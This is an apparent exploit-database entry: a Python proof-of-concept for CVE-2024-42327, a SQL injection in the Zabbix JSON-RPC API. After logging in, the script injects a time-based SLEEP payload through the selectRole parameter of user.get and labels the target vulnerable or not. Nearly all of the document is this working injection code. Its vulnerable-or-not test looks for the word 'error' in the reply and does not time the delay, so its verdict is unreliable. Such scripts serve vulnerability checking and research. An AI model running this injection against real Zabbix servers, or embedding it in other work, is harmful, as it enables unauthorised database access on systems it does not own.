# Exploit Title: Zabbix 7.0.0 - SQL Injection
# Date: 06/12/2024
# Exploit Author: Leandro Dias Barata @m4nb4
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://support.zabbix.com/browse/ZBX-25623
# Version: 6.0.0 - 6.0.31 / 6.0.32rc1 6.4.0 - 6.4.16 / 6.4.17rc1 7.0.0
# Tested on: Kali Linux   kali-linux-2024.3
# CVE: CVE-2024-42327

import requests
import argparse

HEADERS = {"Content-Type": "application/json"}

def main():
    parser = argparse.ArgumentParser(description="CHECK for CVE-2024-42327")
    parser.add_argument("-t", "--target", required=True, help="API URL")
    parser.add_argument("-u", "--username", required=True, help="Username")
    parser.add_argument("-p", "--password", required=True, help="Password")

    args = parser.parse_args()

    url = f"{args.target.rstrip('/')}/api_jsonrpc.php"

    # Login to get the token
    login_data = {
        "jsonrpc": "2.0",
        "method": "user.login",
        "params": {"username": args.username, "password": args.password},
        "id": 1,
        "auth": None
    }

    try:
        login_response = requests.post(url, json=login_data, headers=HEADERS)
        login_response.raise_for_status()
        auth_token = login_response.json().get("result")

        # Simple SQLi test
        data = {
            "jsonrpc": "2.0",
            "method": "user.get",
            "params": {
                "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
                "userids": ["1", "2"]
            },
            "id": 1,
            "auth": auth_token
        }

        test_response = requests.post(url, json=data, headers=HEADERS)
        test_response.raise_for_status()

        if "error" in test_response.text:
            print("[-] NOT VULNERABLE.")
        else:
            print("[!] VULNERABLE.")

    except requests.RequestException as e:
        print(f"[!] Request error: {e}")

if __name__ == "__main__":
    main()